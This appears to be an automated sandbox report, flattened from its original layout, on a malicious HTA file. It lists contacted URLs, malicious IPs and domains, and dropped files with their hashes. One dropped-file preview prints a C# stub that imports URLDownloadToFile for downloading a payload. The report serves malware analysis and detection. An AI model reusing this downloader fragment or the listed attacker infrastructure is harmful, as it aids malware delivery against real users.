                                                                                                                                            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttflSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.inastra.online/__media__/design/underconstructionnotice.php?d=inastra.onlinelSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                              unknown
                                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://www.microsoft.cjzpowershell.exe, 00000003.00000002.2203096096.0000000008A06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://microsoft.coXpowershell.exe, 00000008.00000002.2474478084.0000000007755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.qmmkl.buzzlSomfUdjbC.exe, 0000000C.00000002.4516216085.0000000006C64000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://libs.jshub.com/font-awesome/5.10.0-12/css/fontawesome.min.csslSomfUdjbC.exe, 0000000C.00000002.4514859333.00000000059A6000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.0000000006006000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://i1.cdn-image.com/__media__/js/min.js?v2.3lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://crl.microspowershell.exe, 00000008.00000002.2474478084.0000000007755000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
IP | Domain | Country | ASN | ASN Name | Malicious
62.149.128.40 | chalet-tofane.net | Italy | 31034 | ARUBA-ASNIT | true
104.21.31.249 | www.aaavvejibej.bond | United States | 13335 | CLOUDFLARENETUS | true
172.245.123.3 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
154.82.100.177 | wmnfkj.a.1112dns.com | Seychelles | 32708 | ROOTNETWORKSUS | true
199.115.230.222 | www.qmmkl.buzz | Canada | 25820 | IT7NETCA | true
208.91.197.27 | www.inastra.online | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
162.213.249.216 | www.tophcom.online | United States | 22612 | NAMECHEAP-NETUS | true
3.33.130.190 | deikamalaharris.info | United States | 8987 | AMAZONEXPANSIONGB | true
                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                    Analysis ID:1568883
                                                                                                                                                    Start date and time:2024-12-05 05:37:06 +01:00
                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 10m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winHTA@21/17@12/8
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 83.3%
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 90%
                                                                                                                                                    • Number of executed functions: 88
                                                                                                                                                    • Number of non-executed functions: 272
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Found application associated with file extension: .hta
                                                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.203.160.36
                                                                                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ion.cloudinary.com.edgekey.net, e1315.dsca.akamaiedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                    • Execution Graph export aborted for target mshta.exe, PID 5440 because there are no executed function
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
23:37:53 | API Interceptor | 112x Sleep call for process: powershell.exe modified
23:39:13 | API Interceptor | 10282962x Sleep call for process: ieUnatt.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                      • 198.46.178.192
                                                                                                                                                      dgreatth.docGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 192.3.95.197
                                                                                                                                                      MdDRzxozMD.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.168.7.19
                                                                                                                                                      fUHl7rElXU.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                      • 104.168.7.19
                                                                                                                                                      boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 198.23.133.131
                                                                                                                                                      boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 198.23.133.131
                                                                                                                                                      boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 198.23.133.131
                                                                                                                                                      boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                      • 198.23.133.131
                                                                                                                                                      No context
                                                                                                                                                      No context
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (3312), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):154122
                                                                                                                                                      Entropy (8bit):3.797078519180834
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:AeCzex8lzZz7iH9LcVKCeCzex8lzZz7iH9LcVK0eCzex8lzZz7iH9LcVKv:rCq6byowtCq6byowXCq6byowv
                                                                                                                                                      MD5:36525DA89F51430CBE32984C7B02386C
                                                                                                                                                      SHA1:264C384FC9CC6A9653D89B1683B2CBA64FDDBDD3
                                                                                                                                                      SHA-256:291D319C93575A83DA2C4F10F34848CAA5CED7996D433BDA9A713C5ABE4E418A
                                                                                                                                                      SHA-512:26AC864262759E211F33E8EEBA219856A82C9C721B0A69D989E59632B415531C05B547A348B3C29D7B4C9B3AC2050B93EB58D0FE3CBFC10AEA9ABA71D79C2455
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):5829
                                                                                                                                                      Entropy (8bit):4.901113710259376
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                                                                      MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                                                                      SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                                                                      SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                                                                      SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1144
                                                                                                                                                      Entropy (8bit):5.328291987572489
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:3sYgSKco4KmBs4RPT6BmFoUvjKTIKo+mZ9t7J0gt/NKM9r8Hd:fgSU4y4RQmFoULF+mZ9tK8NF9u
                                                                                                                                                      MD5:C793A31D0A54FF3F016E090006AEEDDE
                                                                                                                                                      SHA1:4FF9B5CE77734490A100FD0D2C58017D19E8B5F8
                                                                                                                                                      SHA-256:5C1A65AB2320546B489D20A3A5B2F6CD485235BD1D533D3DFD2AE1F8A5B01849
                                                                                                                                                      SHA-512:FA1A61BCA5810218CB8B4A8C09AC4EC66F4575AF3B92933909F4DEDF4A5564FD25BE6BC8F017A60952F03A11F505831AF9050CE5508171CD4A789015D497A759
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:@...e.................................,..............@..........@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...|...........System.Configuration4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                                                                                                      Process:C:\Windows\SysWOW64\ieUnatt.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):196608
                                                                                                                                                      Entropy (8bit):1.1239949490932863
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                      MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Thu Dec 5 06:34:55 2024, 1st section name ".debug$S"
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1340
                                                                                                                                                      Entropy (8bit):3.97976169240799
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:HsK9ocajv/ykaH8wKcjmfwI+ycuZhNSDakSVMPNnqSed:GZjv/yBjK2mo1ulOa36qS+
                                                                                                                                                      MD5:49259636E57B707915D5FDF334549C22
                                                                                                                                                      SHA1:1FB5661CDA1B9740103B3443982D21557046D36A
                                                                                                                                                      SHA-256:61096E017A5BA6AEBC0D90AF0AA8DF6EF1C1F1DA39CFACCEA3A01D796635127C
                                                                                                                                                      SHA-512:209699F78625EEA5911B274F01CC73D2B669FE5021A28F18320C6537C6E19B7B7F425155D4EBE779CD51F448CB4BF7CD425930EF5F5FF1BDB02A46790250FD43
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:L....IQg.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........V....c:\Users\user\AppData\Local\Temp\dtaz5slk\CSCC90739EC0644DC2B3B75DC9F86B7B59.TMP..................SG0=p...0X..............7.......C:\Users\user\AppData\Local\Temp\RES5695.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.t.a.z.5.s.l.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):60
                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                      File Type:MSVC .res
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):652
                                                                                                                                                      Entropy (8bit):3.098977814938013
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry06Gak7YnqqV6XPN5Dlq5J:+RI+ycuZhNSDakSVMPNnqX
                                                                                                                                                      MD5:E55347303D70F90E1D30580FEAD4E2A1
                                                                                                                                                      SHA1:423E48A499E3D0FD453BB9EE832D6D6FBAA01598
                                                                                                                                                      SHA-256:595F25C50400766A7885A115EA4F7BF96A575E9586606D982B56BB09D7EAF8E6
                                                                                                                                                      SHA-512:DB48A6B6B602C6D5A9E24E1677521FFAA2F1B84EC2DB1C73B7BB2DC813B8B6F7CE132777028F8FB7B7014B39CE54A6BC24CA1E67D865FBF87FCD9FBFA3FC473D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.t.a.z.5.s.l.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.t.a.z.5.s.l.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (347)
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):464
                                                                                                                                                      Entropy (8bit):3.778677795474975
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:V/DsYLDS81zuIeH012mMGbJJQXReKJ8SRHy4HW4KYKT46Qy:V/DTLDfuIwKyXfHqDs6Qy
                                                                                                                                                      MD5:467F968BF8CBA56E9FB63BC18E3D9BD9
                                                                                                                                                      SHA1:1D1ACD9472B4D6B81A4C1031C742A260E10ADDFD
                                                                                                                                                      SHA-256:FADF7FC663E8A75FD9915BB9E98D899BC02270F552E47822CDC23CC208A326D4
                                                                                                                                                      SHA-512:004DE62BF3FEAF85154B1EB203108A44775B35E81F90C2DFE3E717996F56B09D703AB14C8EF1D2786DEB94CAA403E5AF4C65AC8B5D52675C64CA8FFC4452369D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.using System;.using System.Runtime.InteropServices;..namespace rITSBqyIB.{. public class jzjh. {. [DllImport("urLmON.dlL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr QmQh,string D,string KLayUeqJeo,uint dM,IntPtr KpA);.. }..}.
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):375
                                                                                                                                                      Entropy (8bit):5.196548279697297
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fKJOabJOt0zxs7+AEszIN723fKJOabJO:p37Lvkmb6K2aSNb40WZETaSNba9n
                                                                                                                                                      MD5:69BF8AA3767DBB75314C53FD544F4D11
                                                                                                                                                      SHA1:9BAA3484E5099C75A4A47D145849C42EFB78D661
                                                                                                                                                      SHA-256:E4CF3F636CEAB3D6E7129617D05A40AFF09CD8CC30A450D25DEF6C4F6B08E733
                                                                                                                                                      SHA-512:068F0955D07617E6C7D30E905575DAD1F9206B5478891ACCA29EAA86500EC97E6468DFC157635473FD5B15E3726D81837913EE71631ACC8A1BD82A65B76B84C1
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.0.cs"
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):3072
                                                                                                                                                      Entropy (8bit):2.816178663259939
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:etGS6PBu5exl8skOgkeYMq/jz3LFPtkZfJ4GA+xCjcUWI+ycuZhNSDakSVMPNnq:6Rsx+//YMcgJQoCA31ulOa36q
                                                                                                                                                      MD5:51592476C00B9D60D047F44F92D56CB9
                                                                                                                                                      SHA1:63B1974536FBAC4670A8C0AF4C71AA0971C14C9D
                                                                                                                                                      SHA-256:934684614F3F4CE58A26CBA592ECD9FA743BBDDA158410B68F29682E5D2CDB5C
                                                                                                                                                      SHA-512:479C8A2D0C38644ECE393F8ACB7C43C7D80C930D057184A671FCFACF7E59ECE05E19D4178DB2B2A4BCD530BAB8EFD858BE92E3B987572BB7D72929424C900AB8
                                                                                                                                                      Malicious:false
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):876
                                                                                                                                                      Entropy (8bit):5.286501734654573
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:KOuqd3ka6K2aoyETaoe9uKax5DqBVKVrdFAMBJTH:yika6CoyE+oe9uK2DcVKdBJj
                                                                                                                                                      MD5:253E83BFD499466CE881DA176FB97216
                                                                                                                                                      SHA1:B1D40F6F1DD5E26AF5B06887EEF73669B5812891
                                                                                                                                                      SHA-256:810F42EC4078D8E8D7BD3AECC4B017A1432A6076C2358F503ACC3F9CCE5682BD
                                                                                                                                                      SHA-512:D6DB275BEDA9ADE5C9F3F03BFED85BC51358F1402B9B651D59B3EE15CB6DEE1BB6F15B417ADF3E84518502CF3004D6E97D514E0CDCA8638B5A45F5DFD76BFDC5
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dtaz5slk\dtaz5slk.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (3312), with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):154122
                                                                                                                                                      Entropy (8bit):3.797078519180834
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:AeCzex8lzZz7iH9LcVKCeCzex8lzZz7iH9LcVK0eCzex8lzZz7iH9LcVKv:rCq6byowtCq6byowXCq6byowv
                                                                                                                                                      MD5:36525DA89F51430CBE32984C7B02386C
                                                                                                                                                      SHA1:264C384FC9CC6A9653D89B1683B2CBA64FDDBDD3
                                                                                                                                                      SHA-256:291D319C93575A83DA2C4F10F34848CAA5CED7996D433BDA9A713C5ABE4E418A
                                                                                                                                                      SHA-512:26AC864262759E211F33E8EEBA219856A82C9C721B0A69D989E59632B415531C05B547A348B3C29D7B4C9B3AC2050B93EB58D0FE3CBFC10AEA9ABA71D79C2455
                                                                                                                                                      Malicious:true
